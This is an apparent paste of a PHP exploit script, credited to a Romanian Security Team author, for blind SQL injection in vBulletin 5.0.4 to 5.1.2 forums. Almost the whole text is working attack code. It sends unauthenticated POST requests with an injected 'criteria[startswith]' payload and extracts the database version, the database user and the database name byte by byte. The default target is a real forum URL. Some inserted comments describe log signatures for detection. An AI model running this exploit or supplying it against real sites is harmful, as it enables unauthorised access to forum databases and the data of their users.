
[SCRIPT]=> EXPLOIT vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1 y 5.

Googleinurl Sep 3rd, 2014 2,530 Never
  1. <?php
  2.  
  3. /*
  4. Inyección SQL en los foros vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1 y 5.1.2 (Exploit + Video)
  5. http://www.blackploit.com/2014/07/inyeccion-sql-en-los-foros-vbulletin.html
  6.     Author: Nytro
  7.     Powered by: Romanian Security Team
  8.     Price: Free. Educational.
  9. */
  10.  
  11.  
  12. error_reporting(E_ALL);
  13. ini_set('display_errors', 1);
  14.  
  15.  
// Get arguments
//
// The first CLI argument is the base URL of the forum; without one the URL
// below is used. $expression is the same URL with every '/' escaped as '\/',
// which is the form it takes inside the JSON-encoded HTML that the response
// parsing further down matches against.


$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);
  21.  
  22.  
  23. // Function to send a POST request
  24.  
  25.  
// Function to send a POST request
//
// Sends $params as the POST body to $url and returns the response body, or
// false when curl_exec() fails. Points a reviewer should note:
//   - CURLOPT_SSL_VERIFYPEER is switched off, so the target's TLS certificate
//     is never validated.
//   - Referer and Cookie are hard-coded to the default forum's host rather than
//     derived from $url; X-Requested-With mimics the forum's own AJAX calls, so
//     that header alone is not a useful discriminator in logs.
//   - `$output == FALSE` is a loose comparison: an empty body (or "0") is
//     reported as a transport error as well.
//   - curl_error() is passed through htmlspecialchars() although output goes to
//     a terminal, not a browser.
function httpPost($url,$params)
{
    $ch = curl_init($url);


    curl_setopt($ch, CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

    // Static request headers; none of them depend on $url.
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
     ));


    $output = curl_exec($ch);

    // Loose comparison: see the header comment.
    if($output == FALSE) print htmlspecialchars(curl_error($ch));


    curl_close($ch);
    return $output;
}
  56.  
  57.  
  58. // Function to get string between two other strings
  59.  
  60.  
  61. function get_string_between($string, $start, $end)
  62. {
  63.     $string = " ".$string;
  64.     $ini = strpos($string,$start);
  65.     if ($ini == 0) return "";
  66.     $ini += strlen($start);
  67.     $len = strpos($string,$end,$ini) - $ini;
  68.     return substr($string,$ini,$len);
  69. }
  70.  
  71.  
// Get version
//
// Boolean-based blind extraction, one byte per request: criteria[startswith]
// carries a quoted OR clause, so the member list is non-empty exactly when the
// first byte of some username equals byte $letter of version(). The first
// username of the ascending list is pulled out of the JSON-encoded HTML and its
// first byte is printed; the 'No Users Matched Your Query' marker ends the
// loop. Defensively, the signature to alert on in web-server logs is a POST to
// /ajax/render/memberlist_items whose criteria[startswith] value contains SQL
// syntax (a quote followed by OR / SUBSTR(...)) together with
// securitytoken=guest, i.e. an unauthenticated caller.


print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
print "Version: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1; // 1-based byte position of version() currently being probed


while(strpos($result, 'No Users Matched Your Query') == false)
{
    // The body is JSON, so '"' and '/' inside the embedded HTML are escaped;
    // the single-quoted pattern matches that escaped form literally.
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    // Anchor text of the first member link; only its first byte is relevant.
    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
     
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(  ),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
  100.  
  101.  
// Get user
//
// Same byte-at-a-time technique as the version() loop above, this time against
// user(), the account the forum connects to the database with. The same
// request signature applies for detection; the only difference on the wire is
// the function name inside criteria[startswith].


print "\r\nUser: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1; // 1-based byte position of user() currently being probed


while(strpos($result, 'No Users Matched Your Query') == false)
{
    // Split on the JSON-escaped first member link (see the version loop).
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
  130.  
  131.  
// Get database
//
// Third pass of the same byte-at-a-time loop, probing database(). The three
// loops are copies of each other with only the probed function changed; a
// defender looking at access logs will see the same endpoint hit once per
// extracted byte, which makes the request rate itself a usable signal.


print "\r\nDatabse: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  1,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1; // 1-based byte position of database() currently being probed


while(strpos($result, 'No Users Matched Your Query') == false)
{
    // Split on the JSON-escaped first member link (see the version loop).
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  ' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// No semicolon needed: the closing PHP tag that follows terminates the statement.
print "\r\n"
  163.  
  164.  
  165. ?>